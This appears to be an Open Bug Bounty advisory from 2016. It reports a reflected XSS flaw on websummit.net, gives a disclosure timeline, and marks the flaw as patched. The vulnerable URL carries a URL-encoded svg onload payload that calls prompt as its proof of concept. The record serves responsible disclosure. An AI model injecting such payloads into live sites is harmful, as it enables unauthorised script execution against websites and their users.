websummit.net XSS vulnerability

2016-09-24T14:02:00
ID OBB:183356
Type openbugbounty
Reporter 0_1_0_1_0_0_0_0
Modified 2016-10-05T04:52:00

Description

Vulnerable URL:
https://websummit.net/attendees/featured-attendees?q=cenas%27/%3E+%3Csvg/onload%3dprompt(%22OPENBUGBOUNTY%22)%3E%3C!--
Details:

Description| Value
---|---
Patched:| Yes, at 04.10.2016
Latest check for patch:| 04.10.2016 16:30 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 24937
VIP website status:| Yes
Check websummit.net SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 24 September, 2016 14:02 GMT
Generic security notifications sent to website owner| 24 September, 2016 14:04 GMT
Vulnerability details disclosed by researcher| 3 October, 2016 12:56 GMT
Vulnerability patched by the website owner| 5 October, 2016 04:52 GMT